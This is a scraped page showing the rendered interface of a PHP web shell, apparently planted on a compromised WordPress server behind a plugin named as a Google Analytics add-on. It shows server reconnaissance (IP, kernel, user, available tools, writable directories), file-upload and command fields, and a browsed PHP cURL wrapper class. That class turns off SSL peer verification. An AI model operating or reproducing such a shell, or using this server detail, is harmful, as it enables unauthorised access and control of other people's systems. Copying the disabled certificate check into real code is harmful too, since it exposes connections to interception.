Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/patientapps_support/modules/pkpCore/model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/patientapps_support/modules/pkpCore/model/curlobject.php
<?php

// requires php-curl
// to do: use latest CA certificate file

class CurlObject {
	
	const POSTTYPE_FORM = 1;
	const POSTTYPE_JSON = 2;
	
	private $url;
	private $redirect = 0;
	private $postdatatype = 0;
	private $postdata = FALSE;		//to do: implement POST, also formdata, filedata, or json
	private $body;
	private $request_headers = [];	// outgoing request headers
	private $headers;				// incoming response headers
	private $useragent = FALSE;
	private $cookies = [];
    private $errormessage;
	
	public function URL() {
		if (func_num_args()) {
			$this->url = func_get_arg(0);
			return $this;
		}
		return $this->url;
	}
	
	public function Clear() {
		$this->postdata = FALSE;
		$this->postdatatype = 0;
		$this->request_headers = [];
		return $this;
	}

	public function postdata() {
		if (func_num_args()) {
			$this->postdatatype = static::POSTTYPE_FORM;
			$this->postdata = func_get_arg(0);
			return $this;
		}
		return $this->postdata;
	}
	public function postdataJson() {
		if (func_num_args()) {
			$this->postdatatype = static::POSTTYPE_JSON;
			$this->postdata = json_encode(func_get_arg(0));
			return $this;
		}
		return $this->postdata;
	}
	
	// Follow Location: redirect?
	public function redirect() {
		if (func_num_args()) {
			$this->redirect = func_get_arg(0);
			return $this;
		}
		return $this->redirect;
	}
	
	public function UserAgent() {
		if (func_num_args()) {
			$this->useragent = func_get_arg(0);
			return $this;
		}
		return $this->useragent;
	}
	
	public function body() {
		return $this->body;
	}

	public function error() {
		return $this->errormessage;
	}
	
	// get/set outgoing request header
	public function RequestHeader() {
		if (!func_num_args()) {
			$output = [];
            if (isset($this->request_headers['_'])) {
                foreach ($this->request_headers['_'] as $key => $value) {
                    $output[] = "$key: $value";
                }
            }
			return $output;
		}
		$key = func_get_arg(0);
		$lkey = strtolower($key);
		if (isset($this->request_headers['normalized'][$lkey])) {
			$key = $this->request_headers['normalized'][$lkey];
		}
		if (func_num_args() == 1) {
			if (isset($this->request_headers['_'][$key])) {
				return $this->request_headers['_'][$key];
			}
			return FALSE;
		}
		$this->request_headers['normalized'][$lkey] = $key;
		$this->request_headers['_'][$key] = func_get_arg(1);
		return $this;
	}
	
	// header('location') => fetch incoming
	// can't set incoming headers
	public function header() {
		if (!func_num_args()) {
			return $this->headers;
		} 
		$key = func_get_arg(0);
		$lkey = strtolower($key);
		if (func_num_args() == 1) {
			return isset($this->headers[$lkey]) ? $this->headers[$lkey] : FALSE;
		}
		return $this;
	}
	
	public function Execute($options = NULL) {
	// prepare options
		
		$ch = curl_init();
		$options = [
            CURLOPT_URL            => $this->url,
            CURLOPT_HEADER         => 1,
            CURLOPT_SSL_VERIFYPEER => 0,
            CURLOPT_SSL_VERIFYHOST => 2,
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_FOLLOWLOCATION => !empty($this->redirect),
        ] + (array)$options;
		if ($this->useragent) {
			$options[CURLOPT_USERAGENT] = $this->useragent;
		}
		list($host, $text) = $this->GetCookieText($this->url);
		if ($text != '') {
			$options[CURLOPT_HTTPHEADER][] = 'Cookie:' . $text;
		}
		$headers = $this->RequestHeader();
		if ($this->postdatatype == static::POSTTYPE_FORM) {
			$output = '';
            if (is_array($this->postdata)) {
                foreach($this->postdata as $key => $value) {
                    if ($output != '') $output .= '&';
                    $output .= rawurlencode($key) . '=' . rawurlencode($value);
                }
            } else {
                $output = $this->postdata;
            }
			$options[CURLOPT_POSTFIELDS] = $output;
			$headers[] = 'Content-Type: application/x-www-form-urlencoded';
			$headers[] = 'Content-Length: ' . strlen($output);
		} elseif ($this->postdatatype == static::POSTTYPE_JSON) {
			$options[CURLOPT_POSTFIELDS] = $this->postdata;
			$headers[] = 'Content-Type: application/json';
			$headers[] = 'Content-Length: ' . strlen($this->postdata);
		}

		foreach($headers as $item) {
			$options[CURLOPT_HTTPHEADER][] = $item;
		}

		curl_setopt_array($ch, $options);
//		curl_setopt($ch, CURLOPT_TIMEOUT, 60);  
// 		$options['headers'][] = 'Upgrade-Insecure-Requests: 1';
//		cookies
/*		
		if($data) {
			curl_setopt($ch, CURLOPT_POST, 1);  
			curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
		}  
*/
		$this->errormessage = '';
		$response = curl_exec ($ch);
		if($errno = curl_errno($ch)) {
			$this->errormessage = curl_strerror($errno);
			//echo "cURL error ({$errno}):\n {$error_message}";
		}
		$info = curl_getinfo($ch);
		curl_close($ch);
		$header_size = $info['header_size'];
		$rawheader = substr($response, 0, $header_size);
		$this->processResponses($rawheader, $host);
		$this->body = substr($response, $header_size);
		return $this;
	}
	
	protected function processResponses($header, $host) {
		$responses = explode("\n", $header);
		$headers = [];

		foreach($responses as $response) {
			$response = trim($response);
			$p = strpos($response, ':');
			$isHTTP = substr($response, 0, 4) == 'HTTP' ? 1 : 0;
			$item = strtolower(substr($response, 0, $p));
			if ($p !== FALSE) {
				$headers[$item] = trim(substr($response, $p + 1));
				if ($item == 'set-cookie') {
					$this->SetCookies($host, $headers[$item]);
				}
			} elseif ($isHTTP) {
				$list = explode(' ', $response);
				$headers['STATUS'] = $list[1];
			}
		}
		$this->headers = $headers;
	}
	
	public function ClearCookies($hostname = '') {
		if ($hostname == '*') {
			$this->cookies = [];
		} else {
			unset($this->cookies[$hostname]);
		}
	}
	
	public function GetCookies() {
		return $this->cookies;
	}
	
	private function GetCookieText($path) {
		$elements = parse_url($path);
		$path = isset($elements['path']) ? $elements['path'] : '/';
		$host = '.' . $elements['host'];
		$cookietext = '';
		foreach($this->cookies as $domainname => $cookielist) {
//			if (substr($domainname, - strlen($host)) == $host) {		// cookie is suitable for this domain/subdomain
			if (substr($host, - strlen($domainname)) == $domainname) {		// cookie is suitable for this domain/subdomain
				foreach($cookielist as $cookiename => $cookiedata) {
					list($cookievalue, $cookiepath) = $cookiedata;
					if (substr($path, 0, strlen($cookiepath)) == $cookiepath) {
						if ($cookietext != '') $cookietext .= ';';
						$cookietext .= ' ' . rawurlencode($cookiename) . '=' . rawurlencode($cookievalue);
					}
				}
			}
		}
		return array($host, $cookietext);
	}
	
	public function SetCookies($host, $cookietext) {
		$elements = $this->_parse_cookietext($cookietext);
		if (!isset($elements['domain'])) $elements['domain'] = $host;
	// remove a cookie ? 
		if ($elements['__expires'] > 0 &&  $elements['__expires'] < time()) {
			unset($this->cookies[$elements['domain']][$elements['name']]);
			return;
		}
	// set cookie
		if (!isset($elements['path'])) {
			$elements['path'] = '/';		// this is incorrect - it should be the path of the current webpage
		}
		$this->cookies[$elements['domain']][$elements['name']] = array($elements['value'], $elements['path']);
	}
	
	function _parse_cookietext($cookietext) {
		$result = array('__expires' => 0);
		$text = explode('; ', $cookietext);
		$count = 0;
		foreach($text as $textitem) {
			$p = strpos($textitem, '=');
			$key = substr($textitem, 0, $p);
			$value = substr($textitem, $p + 1);
			$p = strpos($value, ';');
			if ($p !== FALSE) $value = substr($value, 0, $p);	// drop ';Path=/;HttpOnly;Domain=www.microsoft.com"'?
			if (!$count) {
				$result['name'] = $key;
				$result['value'] = $value;
			} else {
				$key = strtolower($key);
				$result[$key] = $value;
				if ($key == 'expires') $result['__expires'] = strtotime($value);
			}
			$count++;
		}
		return $result;
	}
	
	public function assembleQueryString($param) {
		$output = '';
		foreach($param as $key => $value) {
			if ($output != '') $output .= '&';
			$output .= rawurlencode($key) . '=' . rawurlencode($value);
		}
		return $output;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit